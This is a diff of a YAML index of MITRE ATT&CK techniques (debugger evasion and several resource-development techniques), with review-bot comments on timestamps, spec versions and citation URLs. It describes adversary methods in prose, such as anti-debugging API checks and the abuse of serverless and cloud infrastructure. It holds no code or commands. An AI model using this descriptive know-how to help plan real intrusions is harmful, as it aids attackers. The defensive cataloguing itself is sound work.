Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -51881,7 +52563,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1124:
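Review bot: T1622 keeps `x_mitre_attack_spec_version: 2.1.0` while the other techniques in this change are bumped to `3.2.0`, and its `modified` value moves backwards (2022-05-11 to 2022-04-16); together these suggest the T1622 entry was pulled from an older bundle than the rest. Confirm the source bundle version for this technique before merging.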
@@ -51984,13 +52665,12 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests: []
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -52001,7 +52681,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -52072,29 +52752,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -52118,15 +52797,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
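Review bot: the new `GWS Apps Script Abuse 2021` reference URL ends in `#google_vignette`, which is a fragment the site's ad overlay appends in the browser, not part of the canonical article URL; it should be stripped before the reference lands in the data, even if upstream carries it.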
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -52158,17 +52840,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -52221,11 +52902,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -52261,7 +52941,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -52310,43 +52990,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -52359,18 +53008,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1583.002:
technique:
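Review bot: `spec_version: '2.1'` is dropped from this object (the same removal repeats in every later hunk of this file) while `x_mitre_attack_spec_version` moves from `2.1.0` to `3.2.0`. `spec_version` is a required common property on STIX 2.1 objects, so confirm that whatever consumes this index, and the generator that emits it, no longer expects the field; if it disappeared only because the generator stopped writing it, say so in the PR description. The rest of the hunk is a key reorder plus additions that fit the new spec version: `type`, `id`, `created`, `revoked: false`, `x_mitre_deprecated: false`, `x_mitre_domains` and `x_mitre_platforms` appear as additions, the DigiNotar, Splunk Kovar and Let's Encrypt references appear as additions, and `x_mitre_version` stays at `'1.2'`.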
@@ -52392,7 +53072,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
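Review bot: `modified` goes backwards here, from `2022-04-25T14:00:00.188Z` to `2021-04-15T02:49:49.702Z`, and the same pattern repeats below for T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002, T1584.003, T1588.001, T1586 and T1584.005. The old values all share the `14:00:00.188Z` millisecond suffix, which looks like a timestamp stamped in bulk rather than the object's real upstream `modified` time, while the new values look like genuine upstream timestamps, so this is most likely a correction. Still, confirm against the upstream STIX bundle, and check that nothing in the repo (index sorting, change detection, caching) assumes `modified` only ever increases.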
@@ -52408,8 +53088,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
@@ -52431,7 +53109,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -52451,8 +53129,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -52491,7 +53167,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -52512,8 +53188,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -52543,7 +53217,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -52580,8 +53254,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -52603,7 +53275,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52625,8 +53297,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -52663,7 +53333,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -52685,8 +53355,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -52748,7 +53416,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -52770,7 +53437,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52788,8 +53455,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -52824,7 +53489,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52843,33 +53508,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
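Review bot: the substantive change in this hunk is limited to the new sentence on cloud messaging services (Twilio, SendGrid, AWS End User Messaging, SNS, SES) in `description`, the `x_mitre_version` bump from `'1.0'` to `'1.1'` and the `modified` update; the moves of `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_platforms` and `x_mitre_is_subtechnique` are key reordering only. A stable key order in the generator would keep diffs of this index down to the real changes. The new sentence introduces two citation keys, `Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022` and `Netcraft SendGrid 2024`; both need a matching `source_name` under `external_references`, which the following hunk supplies.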
@@ -52879,10 +53542,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
@@ -52890,9 +53562,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
@@ -52943,11 +53614,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52960,7 +53630,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -52995,22 +53665,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
